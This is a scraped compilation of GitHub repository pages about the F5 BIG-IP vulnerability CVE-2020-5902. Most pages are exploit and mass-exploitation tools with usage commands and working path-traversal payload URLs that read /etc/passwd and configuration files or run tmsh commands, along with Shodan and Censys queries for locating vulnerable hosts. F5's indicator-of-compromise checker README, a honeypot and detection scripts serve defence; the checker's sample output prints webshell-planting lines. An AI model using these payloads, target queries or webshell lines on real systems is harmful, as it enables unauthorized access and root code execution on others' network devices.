README.md: f5_scanner. F5 mass scanner and CVE-2020-5902 checker. This tool is a mass scanner with 30 threads hardcoded; use with caution.
How to set up:
$ python3 -m venv venv
$ source venv/bin/activate
$ python3 -m pip install -r requirements.txt
How to run:
Single IP: python3 f5_scanner.py --ip 192.168.1.1
CIDR: python3 f5_scanner.py --cidr 192.168.0.0/24
File: the file should contain one single IP address per line, e.g.:
192.168.0.1
192.168.0.2
192.168.0.3
python3 f5_scanner.py --file file_with_ips.txt
About: F5 mass scanner and CVE-2020-5902 checker. Languages: Python 100.0%. Releases: none published.

Repository by dwisiswant0. Latest commit 7279f69 (6 minutes ago): "Update README.md". 2 commits, 1 branch, 0 tags.
Files: README.md (Update README.md, 6 minutes ago).
README.md: CVE-2020-5902. Shodan: http.favicon.hash:-335242539 "3992"
About: CVE-2020-5902. Releases: none published.

Repository by mheathf5. Latest commit 223ed85 (19 minutes ago): "Initial commit". 1 commit, 1 branch, 1 tag.
Files: CVE-2020-5902_bigip_ioc_checker.py (Initial commit, 19 minutes ago); README.md (Initial commit, 19 minutes ago).

README.md:

CVE-2020-5902 IoC Detection Tool

This script is intended to be executed locally on an F5 BIG-IP in Advanced Shell (bash) by a user with root privileges; it is not intended to be run in any other setting.

Note: Appliance Mode does not allow access to Advanced Shell, and therefore this tool cannot be run on such systems.

The script examines the BIG-IP for the Indicators of Compromise associated with CVE-2020-5902 which were known to F5 Networks at the time of authoring. The script collates these IoCs and presents a report as an overview you can use to inform your determination of the best path forward. If this tool uncovers any IoCs, you should manually examine and confirm them, then follow your own documented procedures for handling suspected compromised systems. F5 specific guidance may be found in K11438344: Considerations and guidance when you suspect a security compromise on a BIG-IP system.

Note: If you have any uncertainty or doubt as to the integrity of any system, the cautious approach is to consider the system compromised and to follow your internal procedures for handling a compromised system. Note also that any information contained on a compromised system should itself be considered compromised. This includes, but is not limited to, passwords, private keys, digital certificates, configurations, logs, etc.

Limitations and considerations

It must be noted that IoCs may no longer be present either due to age (for example, by log rotation schedules) or removal by a sufficiently skilled adversary. As exploitation of CVE-2020-5902 potentially results in remote code execution as the root user, a skilled attacker would be free to sanitize the system of traces after exploitation. Note also that an attacker could poison any binary on the system, including python. Reasonable steps have been taken to avoid the possibility of this; however, you must determine your level of trust in the output of this tool on any system suspected to be compromised.

On BIG-IP versions that include sys-eicheck (13.1.0 onward), this tool offers the administrator the opportunity to check the running system against the original installation RPMs to look for any file modifications in an attempt to ensure the integrity of the system commands this tool relies upon. Note that sys-eicheck can be run on all platforms regardless of FIPS capability. On earlier versions the tool does not currently include this functionality and will run without checking the originally installed system binaries for tampering.

Verifying the authenticity of this script

The sha384 sum of this version of CVE-2020-5902_bigip_ioc_checker.py is:
1583bc8b6a52c71bb49fce26c6f67be2c65aa1f42c433a13fc79616f01a84994b76eaa8ff4bc19ef7833b8f145ba6136
You should only download these files from the F5 DevCentral GitHub repository.

CVE-2020-5902 information

Note that the authoritative source of information on CVE-2020-5902 is always the F5 Security Advisory, K52145254: TMUI RCE vulnerability CVE-2020-5902.

Running the script

Simply download the file CVE-2020-5902_bigip_ioc_checker.py to the target BIG-IP and run it using the python installation already present on BIG-IP. Example:

[root@hostname:Active:Standalone] tmp # python CVE-2020-5902_bigip_ioc_checker.py -h
USAGE: python CVE-2020-5902_bigip_ioc_checker.py
You can use the following options <-iajylcbwut> to skip some checks:
Option: -i or --skip_sys-eicheck
  [+] Skip using the sys_eicheck utility to scan the BIG-IP system for any unexpected changes to the system software.
  [+] Please refer to https://support.f5.com/csp/article/K00029945 for more details about the sys-eicheck utility.
  [+] The sys-eicheck utility may take several minutes to finish.
Option: -a or --skip_audit_check
  [+] Skip scanning the audit log for malicious activities.
Option: -j or --skip_journal_check
  [+] Skip scanning the journal log for malicious activities.
Option: -y or --skip_systems_check
  [+] Skip scanning /config/bigip_user.conf to look for malicious users.
Option: -l or --skip_alias_check
  [+] Skip scanning /config/bigip_*.conf for malicious alias definition.
Option: -c or --skip_catalina_check
  [+] Skip scanning the tomcat catalina.out log for malicious activities.
Option: -b or --skip_bigipstartup_check
  [+] Skip checking if /config/startup contains blacklisted words.
Option: -w or --skip_webshell_check
  [+] Skip checking Files created after 2020 Jun 29 in the /usr/local/www/ to look for possible webshell files.
Option: -u or --skip_autostart_check
  [+] Skip checking Files created after 2020 Jun 29 in /etc/ to look for the possible autostart script.
Option: -t or --skip_tmp_check
  [+] Skip checking Files created after 2020 Jun 29 in /tmp
Option: -p or --disable_color_print
  [+] Disable color print, better for saving result
Option: -q or --bigiq_cmd_check
  [+] Run BIG-IQ compatible malicious command check
Option: -h or --help
  [+] Print usage

Known Issues

If a BIG-IP is managed by BIG-IQ or another automation/management system, it may receive bash commands from the BIG-IQ or another automation/management system. Some of the bash commands have the base64 encoding script embedded. Those bash commands logged in the BIG-IP audit logs could lead the IoC Detection Tool to report the false positive notification: "!! IoC pattern malicious bash command found". To reduce the false positives, you can use the -q option to make the IoC Detection Tool ignore the legitimate base64 encoded script in the audit logs.

Upgrading the system may update the timestamps on files in /usr/local/www/ which may result in a false positive, for example, if the fixed software was recently installed. If any results are returned for any of the file creation date checks, in /usr/local/www/, /etc/, and /tmp/, the files should be examined to determine their legitimacy.

It is possible to still find Indicators of Compromise from the journalctl logs after an upgrade to a fixed version or after applying the workaround. Please review the time stamp of the logs should they be present and verify they happened before the upgrade or applying the workaround.

Sample Output

# python CVE-2020-5902_bigip_ioc_checker.py -iqa
>>>> Skip sys-eicheck check
>>>> Run BIG-IQ compatible malicious command check
>>>> Skip audit log check
CVE-2020-5902 Indicators of Compromise checker. False positive reports are possible and all results should be manually verified.
[+] Version 13.1.0 Build 0.0.1868 CVE-2020-5902 Fixed: False
!! IoC pattern ['/etc/fakefile', '/etc/passwd', '/etc/fakefile1'] access denied in file /var/log/tomcat/catalina.out
!! IoC pattern ['/config/bigip_base.conf'] access denied in file /var/log/tomcat/catalina.out.1
!! IoC pattern Possible backdoor echo "<?php eval(\$_REQUEST[09ede7]);" > /usr/local/www/xui/common/css/webshell.php in file /config/startup
!! IoC pattern Possible backdoor echo "Runtime.getRuntime().exec("cmd.exe /C " + cmd);" > /usr/local/www/xui/common/css/webshell.jsp in file /config/startup
[+]========================== auto start script checking ==========================
!! Files created in /etc/ after 2020 Jun 29, need to check if those are malicious daemon startup script
95291 1 -rw-r--r-- 1 root root 0 Jul 20 14:49 /etc/rc.d/init.d/autostartbackdoor
104847 4 -rw------- 1 root root 199 Jul 13 10:46 /var/spool/cron/root
[+]================================ /tmp/ checking ================================
!! File /tmp/backdoor_curl could be a malicous script
!! File /tmp/CVE-2020-5902_bigip_ioc_checker.py could be a malicous script
!! Files created in /tmp/ after 2020 Jun 29, need to check if those are malicious scripts
18491 40 -rw-r--r-- 1 root root 38066 Jul 20 14:57 /tmp/CVE-2020-5902_bigip_ioc_checker.py
18497 1 -rw-r--r-- 1 root root 0 Jul 20 14:49 /tmp/backdoor_new
[+]============================== webshell checking ==============================
!! Files created in /usr/local/www/ after 2020 Jun 29, need to check if those are webshell or information leakage
243368 4 -rw-r--r-- 1 root root 33 Jul 20 14:49 /usr/local/www/xui/common/css/webshell.php
243367 4 -rw-r--r-- 1 root root 33 Jul 17 08:30 /usr/local/www/xui/common/css/css.php
243369 4 -rw-r--r-- 1 root root 46 Jul 20 14:49 /usr/local/www/xui/common/css/webshell.jsp

EULA, Warranty and licenses

F5 provides the CVE-2020-5902 IoC Detection Tool to help its customers analyze their F5 devices outside of iHealth for certain indicators of compromise related to CVE-2020-5902. Please note, however, that:

The CVE-2020-5902 IoC Detection Tool is not comprehensive, nor is it intended to be: it does not identify all possible indicators of compromise, but only a select group that F5 has found to be generally reliable based on its internal analyses of compromised F5 devices. Not all compromised F5 devices show the same indicators and attackers may be able to remove traces of their work. It is not possible to prove that any device has not been compromised; if there is any uncertainty, additional analysis may be required and/or you may want to consult with your security team.

To avoid undue interruption to a user's business operations, the CVE-2020-5902 IoC Detection Tool should not be operated during peak traffic hours and should instead generally be used during users' regular maintenance windows.

If indicators of compromise are identified, F5 recommends that users follow their documented internal incident response procedures. F5 has provided general considerations and guidance for when a security compromise on a BIG-IP system is suspected in K11438344: Considerations and guidance when you suspect a security compromise on a BIG-IP system. Additionally, users can contact F5 directly for additional support via the Customer Support Portal or other standard channels.

The CVE-2020-5902 IoC Detection Tool is made available for F5 users' convenience and is provided on an "as is" basis under the terms of the Apache License. You use the CVE-2020-5902 IoC Detection Tool at your own risk.

Copyright © 2020 F5 Networks, Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use the CVE-2020-5902 IoC Detection Tool except in compliance with the License. You may obtain a copy of the License at: http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

About: No description, website, or topics provided. Releases: 1 (Version 1.2 Release, latest, 13 minutes ago). Languages: Python 100.0%.

Repository by murataydemir. Latest commit 6a34c5a (1 minute ago): "Initial commit". 1 commit, 1 branch, 0 tags.
Files: README.md (Initial commit, 1 minute ago).
README.md: F5-BIG-IP-CVE-2020-5902-Remote-Code-Execution. F5 BIG-IP CVE-2020-5902 Remote Code Execution.
About: F5 BIG-IP CVE-2020-5902 Remote Code Execution. Releases: none published.

Repository by pwnhacker0x18. Latest commit 8ae5639 (8 minutes ago): "Update README.md". 5 commits, 1 branch, 0 tags.
Files: README.md (Update README.md, 8 minutes ago); Screenshot from 2020-07-11 00-47-30.png (Add files via upload, 9 minutes ago); WorkspaceUtils.java, directoryList_jsp.java, exp.py, fileRead_jsp.java, fileSave_jsp.java, tmshCmd_jsp.java (Add files via upload, 14 minutes ago).
README.md: I am not responsible for any damage caused by this program. CVE-2020-5902-Mass: mass exploit for CVE-2020-5902. Overview.
About: Mass exploit for CVE-2020-5902. Languages: Java 90.4%, Python 9.6%. Releases: none published.

Repository by r0ttenbeef. Latest commit 1fef658 (40 seconds ago): "Initial commit". 1 commit, 1 branch, 0 tags.
Files: README.md (Initial commit, 40 seconds ago).
README.md: cve-2020-5902. cve-2020-5902 POC exploit.
About: cve-2020-5902 POC exploit. Releases: none published.

Repository by c130rg. Latest commit ea87522 (36 seconds ago): "Update README.md". 5 commits, 1 branch, 0 tags.
Files: README.md (Update README.md, 36 seconds ago); checkvulnCVE20205902.ps1 (Add files via upload, 5 minutes ago); funcionamento.png (Add files via upload, 5 minutes ago).
README.md: checkvulnCVE20205902. A PowerShell script to check an IP list for vulnerability CVE-2020-5902. The instructions are in the code. Keep security!
About: A PowerShell script to check an IP list for vulnerability CVE-2020-5902. Languages: PowerShell 100.0%. Releases: none published.

Repository by Any3ite. Latest commit 9f3fd7d (3 minutes ago): "Update README.md". 6 commits, 1 branch, 0 tags.
Files: CVE-2020-5902-F5BIG-Scanner.go (Add files via upload, 11 minutes ago); QQ图片20200707134623.png (Add files via upload, 11 minutes ago); README.md (Update README.md, 3 minutes ago).
README.md: CVE-2020-5902-F5BIG. Just run a command like:
go run CVE-2020-5902-F5BIG-Scanner.go -u *.*.*.* -p 443 -m R -f /etc/issue
or
go run CVE-2020-5902-F5BIG-Scanner.go -u *.*.*.* -p 443 -m C
About: No description, website, or topics provided. Languages: Go 100.0%. Releases: none published.

Repository by halencarjunior. Latest commit 5976cd4 (4 minutes ago): "Readme fix". 3 commits, 1 branch, 0 tags.
Files: LICENSE (Initial commit, 2 days ago); README.md (Readme fix, 4 minutes ago); f5scan.py (f5scan - First Version, 7 minutes ago); requirements.txt (f5scan - First Version, 7 minutes ago).
README.md: f5scan. F5 BIG IP Scanner for CVE-2020-5902 by bt0. More information about the vulnerability: https://support.f5.com/csp/article/K52145254?sf235665517=1
Requirements: python3+, shodan, colorama, urlopen, pyOpenSSL
$ pip3 install -r requirements
Options:
-h, --help  show this help message and exit
-H HOST, --host HOST  IP or Hostname of target
-p PORT, --port PORT  Port of target. Default=443
-hl HOSTLIST, --hostlist HOSTLIST  Use a hosts list e.g. ./hosts.txt
-s, --shodan  Search for hosts in Shodan (Needs api key)
-e, --exploit  exploit target
-c COMMAND, --command COMMAND  command to execute
-lf LFI, --lfi LFI  File to read using LFI Vulnerability
--version  show program's version number and exit
About: No description, website, or topics provided. License: GPL-3.0. Languages: Python 100.0%. Releases: none published.

Repository by dnerzker. Latest commit 187623f (34 seconds ago): "Update README.md". 2 commits, 1 branch, 0 tags.
Files: README.md (Update README.md, 34 seconds ago).
README.md: CVE-2020-5902.
Summary: In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
Proof of concept:
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
POC for CVE-2020-5902:
GET /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=randomstuff
GET /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=AnyMsgHereWillBeReflectedInTheResponse
inurl://"tmui/login.jsp" intitle://"BIG-IP" inurl://"tmui"
Try using the following queries for Shodan:
1. F5-login-pages
2. www-authenticate: Basic realm:BIG-IP
3. BigIP / BIG-IP
4. http.favicon.hash:-335242539
5. http.title:"BIG-IP&req:- Redirect"
Try using the following queries for Censys:
1. 433.https.get.body_sha256:5d78eb6fa93b995f9af90b632f0016e80dbcda8eb71a17994678692585ee5
2. 433.https.get.title:"BIG-IP&req:- Redirect"
Credits: dnerzker
About: No description, website, or topics provided. Releases: none published.

Repository by jiansiting. Latest commit 21ab57d (9 minutes ago): "Create F5BIG-Scanner.py" (version 1.0). 2 commits, 1 branch, 0 tags.
Files: .gitattributes (Initial commit, 10 minutes ago); .gitignore (Initial commit, 10 minutes ago); F5BIG-Scanner.py (Create F5BIG-Scanner.py, 9 minutes ago).
About: F5 BIG-IP Scanner (CVE-2020-5902). Releases: none published.

Repository by jinnywc. Latest commit 0ae9518 (4 minutes ago): "Add files via upload". 3 commits, 1 branch, 0 tags.
Files: exp_cve_2020_5902.py (Add files via upload, 4 minutes ago).
About: CVE-2020-5902. Languages: Python 100.0%. Releases: none published.

Repository by telnet200. Latest commit 20981d3 (now): "Create 1111". 5 commits, 1 branch, 0 tags.
Files: cve-2020-5902 (Create 1111, now); README.md (Update README.md, 10 days ago); cve-2020-5902 BIG-F5.py (Add files via upload, 17 minutes ago); tttt (Create tttt, 2 minutes ago).
README.md: Exploit.
About: some exploits I collected personally. Languages: Python 100.0%. Releases: none published.

Repository by d4rk007. Latest commit 4d8e7b7 (1 minute ago): "Update CVE-2020-5902-mass-exploiter.py". 5 commits, 1 branch, 0 tags.
Files: CVE-2020-5902-mass-exploiter.py (Update CVE-2020-5902-mass-exploiter.py, 1 minute ago); README.md (Update README.md, 2 minutes ago).
README.md: F5-Big-IP-CVE-2020-5902-mass-exploiter. F5 Big-IP CVE-2020-5902 mass exploiter/fuzzer.
usage: mass.py -l list.txt -w workers
About: F5 Big-IP CVE-2020-5902 mass exploiter/fuzzer. Languages: Python 100.0%. Releases: none published.

Repository by yassineaboukir. Latest commit b15c6a4 (9 minutes ago): "Update README.md". 2 commits, 1 branch, 0 tags.
Files: README.md (Update README.md, 9 minutes ago).
README.md: Summary: In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
Proof of concept: Load /etc/passwd:
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
About: Proof of concept for CVE-2020-5902. Releases: none published.

Repository by Shu1L. Latest commit 43f72b0 (4 minutes ago): "fofascan". 1 commit, 1 branch, 0 tags.
Files: README.md (fofascan, 4 minutes ago); fofa.py (fofascan, 4 minutes ago).
README.md: CVE-2020-5902-fofa-scan. Introduction: F5 BIG-IP remote code execution vulnerability (CVE-2020-5902), fofa scanning script. Usage requirements: a fofa membership; fill in the value of _fofapro_ars_session. Modify the keyword value on line 12 yourself.
About: No description, website, or topics provided. Languages: Python 100.0%. Releases: none published.

Repository by ajdumanhug. Latest commit 51341b8 (5 minutes ago): "Create CVE-2020-5902.py". 2 commits, 1 branch, 0 tags.
Files: CVE-2020-5902.py (Create CVE-2020-5902.py, 5 minutes ago); README.md (Initial commit, 5 minutes ago).
README.md: CVE-2020-5902 POC.
About: POC. Languages: Python 100.0%. Releases: none published.

Repository by IanMuchina. Latest commit a1fb899 (3 minutes ago): "add screenshot". 2 commits, 1 branch, 0 tags.
Files: src (Initial Commit, 10 minutes ago); Dockerfile (Initial Commit, 10 minutes ago); README.md (add screenshot, 3 minutes ago).
README.md: CVE-2020-5902 HoneyPot. Docker image emulating this vulnerability found in F5 BIG-IP's web-based Traffic Management User Interface (TMUI). It's not a real TMUI interface.
Usage: docker run -p 1377:443 --hostname example.com muchina/tmui-honeypot
This will run the honeypot on port 1377 with the hostname example.com.
Alerts: You can receive email alerts by using CanaryTokens. Learn more about them here.
1. Creating the token: Download this image (right click > Save Image as). Go to the CanaryTokens website. Choose "Custom Image Web bug" from the drop down list. Leave a reminder note and an email address. Upload the image. Generate the token and copy the URL.
2. Using the token: Run this command, replacing TOKEN_URL with the URL of the token you created:
docker run -e CT="TOKEN_URL" muchina/tmui-honeypot
Screenshot.
Credits: I've forked from this Docker image by Muchilwa that does most of the work.
About: No description or website provided. Topics: cve-2020-5902. Languages: Shell 70.3%, Dockerfile 29.7%.

Repository: CVE-2020-5902 (committer: dunderhay)
Latest commit: a365d92, 4 minutes ago, "Update README.md" (3 commits, 1 branch, 0 tags)
Files:
  CVE-2020-5902.py - Create CVE-2020-5902.py (7 minutes ago)
  README.md - Update README.md (4 minutes ago)
README.md:
CVE-2020-5902
Python script to exploit F5 Big-IP CVE-2020-5902 - LFI and RCE
Examples
  Exploit LFI: python3 CVE-2020-5902.py -t example.com -x lfi -f /etc/passwd
  Exploit RCE: python3 CVE-2020-5902.py -t example.com -x rce -a whoami
About: F5 Big-IP CVE-2020-5902 - LFI and RCE
Releases: No releases published
Languages: Python 100.0%

Repository: CVE-2020-5902 (committer: Al1ex)
Latest commit: ca36508, 1 minute ago, "Update README.md" (4 commits, 1 branch, 0 tags)
Files:
  CVE-2020-5902-EXP1 - Add files via upload (5 minutes ago)
  CVE-2020-5902-EXP2 - Add files via upload (5 minutes ago)
  JD-GUI - Add files via upload (5 minutes ago)
  hsqldb - Add files via upload (5 minutes ago)
  漏洞源文件 (vulnerability source files) - Add files via upload (5 minutes ago)
  README.md - Update README.md (1 minute ago)
README.md:
CVE-2020-5902
  CVE-2020-5902-EXP1: comes from https://github.com/jas502n/CVE-2020-5902
  CVE-2020-5902-EXP2: comes from https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902
  hsqldb: hsqld.jar comes from F5 BIGIP
  sourceCode: source code comes from F5 BIGIP
About: CVE-2020-5902
Releases: No releases published
Languages: Java 89.3%, Python 8.2%, Shell 2.5%

Repository: CVE-2020-5902 (committer: itsjeffersonli)
Latest commit: f72e9f4, 2 minutes ago, "Create README.md" (2 commits, 1 branch, 0 tags)
Files:
  CVE-2020-5902.sh - Add files via upload (3 minutes ago)
  README.md - Create README.md (2 minutes ago)
README.md:
CVE-2020-5902
Exploit for CVE-2020-5902 POC (bash version)
About: Exploit for CVE-2020-5902 POC (bash version)
Releases: No releases published
Languages: Shell 100.0%

Repository: exphub / cve-2020-5902 (committer: zhzyker)
Latest commit: 2bf933a, 2 minutes ago, "Update readme.md" (6 commits, 1 branch, 0 tags)
Files:
  image - images (7 minutes ago)
  cve-2020-5902_file.py - F5 BIG-IP Read File Script (CVE-2020-5902) (9 minutes ago)
  readme.md - Update readme.md (2 minutes ago)
readme.md:
F5 BIG-IP arbitrary file read + remote command execution (RCE)
  +-------------------------------------------------------------+
  + DES: by zhzyker as https://github.com/zhzyker/exphub
  +      CVE-2020-5902 F5 BIG-IP Read File + RCE
  +-------------------------------------------------------------+
  + USE: python3 <filename> <url>
  + EXP: python3 cve-2020-5902_file.py https://1.1.1.1:8443
  + VER: BIG-IP 15.x: 15.1.0/15.0.0
  +      BIG-IP 14.x: 14.1.0 ~ 14.1.2
  +      BIG-IP 13.x: 13.1.0 ~ 13.1.3
  +      BIG-IP 12.x: 12.1.0 ~ 12.1.5
  +      BIG-IP 11.x: 11.6.1 ~ 11.6.5
  +-------------------------------------------------------------+
Payload
  Read file: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
Read File: (screenshot)
About: F5 BIG-IP arbitrary file read + remote command execution (RCE)
Releases: No releases published
Languages: Python 100.0%

Repository: CVE-2020-5902 (committer: ar0dd)
Latest commit: 79e11f1, 2 minutes ago, "Add files via upload" (3 commits, 1 branch, 0 tags)
Files:
  CVE-2020-5902.py - Add files via upload (2 minutes ago)
  README.md - Update README.md (2 minutes ago)
README.md:
CVE-2020-5902
POC code for checking for this vulnerability. Since the code has been released, I decided to release this one as well. Patch Immediately!
Usage:
  python3 CVE-2020-5902.py -u https://big-ip.com -o check 2>/dev/null
About: POC code for checking for this vulnerability. Since the code has been released, I decided to release this one as well. Patch Immediately!
Releases: No releases published
Languages: Python 100.0%

Repository: CVE-2020-5902_RCE (committer: sv3nbeast)
Latest commit: ede1017, 7 minutes ago, "Add files via upload" (3 commits, 1 branch, 0 tags)
Files:
  CVE-2020-5902_RCE.py - Add files via upload (7 minutes ago)
  README.md - Initial commit (12 minutes ago)
  ReadFile.png - Add files via upload (8 minutes ago)
  list.png - Add files via upload (8 minutes ago)
  rce.png - Add files via upload (8 minutes ago)
  result.png - Add files via upload (8 minutes ago)
README.md: CVE-2020-5902_RCE
About: No description, website, or topics provided.
Releases: No releases published
Languages: Python 100.0%

Repository: CVE-2020-5902 (committer: tututu12138)
Latest commit: 8a8b98e, 2 minutes ago, "Update README.md" (3 commits, 1 branch, 0 tags)
Files:
  CVE-2020-5902.py - Create CVE-2020-5902.py (4 minutes ago)
  README.md - Update README.md (2 minutes ago)
README.md: CVE-2020-5902 python poc
About: No description, website, or topics provided.
Releases: No releases published
Languages: Python 100.0%

Repository: CVE-2020-5902 (committer: sdcampbell)
Latest commit: 0bb92a4, 11 minutes ago, "Update README.md" (3 commits, 1 branch, 0 tags)
Files:
  README.md - Update README.md (11 minutes ago)
  http-f5-tmui-path-traversal.nse - Create http-f5-tmui-path-traversal.nse (14 minutes ago)
README.md:
CVE-2020-5902
Nmap script to detect CVE-2020-5902 in F5 BIG-IP.
The original author was b0yd (@rwincey); however, I found the script to be unreliable. I submitted feedback but I don't know how long it will take for them to fix it, so this is my copy, which has been tested against a list including vulnerable and non-vulnerable systems and is 100 percent accurate.
About: Nmap script to detect CVE-2020-5902 in F5 BIG-IP
Releases: No releases published
Languages: Lua 100.0%

Repository: CVE-2020-5902 (committer: murataydemir)
Latest commit: 1b3bc73, 6 minutes ago, "Update README.md" (6 commits, 1 branch, 0 tags)
Files:
  README.md - Update README.md (6 minutes ago)
README.md:
F5 BIG-IP CVE-2020-5902 Remote Code Execution
  https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami
  https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
  https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release
  https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
  https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
  https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
  https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
  https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/
About: F5 BIG-IP CVE-2020-5902 Remote Code Execution
Releases: No releases published

Repository: https://github.com/yasserjanah/CVE-2020-5902 (committer: yasserjanah)
Latest commit: 6ade591, 5 minutes ago, "(^_^)" (3 commits, 1 branch, 0 tags)
Files:
  LICENSE - Initial commit (15 minutes ago)
  README.md - Update README.md (6 minutes ago)
  common_path.txt - (^_^) (5 minutes ago)
  exploit-CVE-2020-5902.py - (^_^) (5 minutes ago)
  requirements.txt - (^_^) (5 minutes ago)
README.md:
CVE-2020-5902
exploit code for F5-Big-IP (CVE-2020-5902)
Summary
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
Proof of concept
  https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
  https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
  https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
  https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
  https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
Usage
  $ git clone https://github.com/yasserjanah/CVE-2020-5902
  $ cd CVE-2020-5902/
  $ pip3 install -r ./requirements.txt
  $ python3 exploit-CVE-2020-5902.py -ip <IP> -f /etc/passwd
  -b to brute force files from a wordlist:
  $ python3 exploit-CVE-2020-5902.py -ip <IP> -b
About: exploit code for F5-Big-IP (CVE-2020-5902)
License: GPL-3.0 License
Releases: No releases published
Languages: Python 100.0%

Repository: https://github.com/nsflabs/CVE-2020-5902 (committer: nsflabs)
Latest commit: 9f66380, 1 minute ago, "Update README.md" (3 commits, 1 branch, 0 tags)
Files:
  README.md - Update README.md (1 minute ago)
README.md:
CVE-2020-5902
(ASCII-art banner: CVE-2020-5902)
CVE-2020-5902-Scanner.py @nsflabs
This is to test if a single remote system is vulnerable to cve-2020-5902.
The F5 BIG-IP Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability. This vulnerability allows for unauthenticated attackers, or authenticated users, with network access to the TMUI, through the BIG-IP management port and/or Self IPs, to execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.
Installation
  $ git clone https://github.com/nsflabs/CVE-2020-5902.git
  $ cd CVE-2020-5902/
  $ pip3 install -r requirements.txt
Usage
  $ python3 cve-2020-5902_scanner.py targetip targetport
About: No description, website, or topics provided.
Releases: No releases published

Repository: WitnessMe (committer: byt3bl33d3r)
Latest commit: 9da2c8c, 6 minutes ago, "Updated README with CVE-2020-5902 guide" (57 commits, 1 branch, 0 tags)
Files:
  .github - Updated README with CVE-2020-5902 guide (6 minutes ago)
  dockerfiles - Fixed Hosted Dockerfile (10 days ago)
  tests - HTML Reporting now working! (2 days ago)
  witnessme - Changed CI workflow (1 hour ago)
  .dockerignore - Fixed Dockerfile (10 days ago)
  .gitignore - Code push (12 months ago)
  Dockerfile - Fixed Dockerfile (10 days ago)
  LICENSE - Initial commit (12 months ago)
  Makefile - Now a Python Package, Updated dockerfiles (11 days ago)
  README.md - Updated README with CVE-2020-5902 guide (6 minutes ago)
  cloudbuild.yaml - Added Dockerfiles and updated Readme (3 months ago)
  poetry.lock - Fixed CSV reporting, code cleanup (2 days ago)
  pyproject.toml - HTML Reporting now working! (2 days ago)
  requirements-dev.txt - Fixed CSV reporting, code cleanup (2 days ago)
  requirements.txt - Fixed CSV reporting, code cleanup (2 days ago)
README.md:

WitnessMe

My take on a Web Inventory tool, heavily inspired by Eyewitness. Takes screenshots of webpages using Pyppeteer (headless Chrome/Chromium). Supports Python 3.7+, fully asynchronous and has extra bells & whistles that make life easier.

Why & what problems does this solve
  - Python 3.7+
  - No dependency/installation hell, works on a variety of *nix flavors
  - AsyncIO provides Mad Max level speeds
  - Headless chrome/chromium is the best.
  - Provides a RESTful API.

Note, the documentation is still a WIP. I've released this early because of CVE-2020-5902.

Quick Starts

Finding F5 Load Balancers Vulnerable to CVE-2020-5902

Note it is highly recommended to give the Docker container at least 4GB of RAM during large scans as Chromium can be a resource hog. If you keep running into "Page Crash" errors, it's because your container does not have enough memory. On Mac/Windows you can change this by clicking the Docker Task Bar Icon -> Preferences -> Resources. For Linux, refer to Docker's documentation.

Install WitnessMe using Docker:
  docker pull byt3bl33d3r/witnessme

Get the $IMAGE_ID from the docker images command output, then run the following command to drop into a shell inside the container. Additionally, specify the -v flag to mount the current directory inside the container at the path /transfer in order to copy the scan results back to your host machine (if so desired):
  docker run -it --entrypoint=/bin/sh -v $(pwd):/transfer $IMAGE_ID

Scan your network using WitnessMe; it can accept multiple .Nessus files, Nmap XMLs, IP ranges/CIDRs. Example:
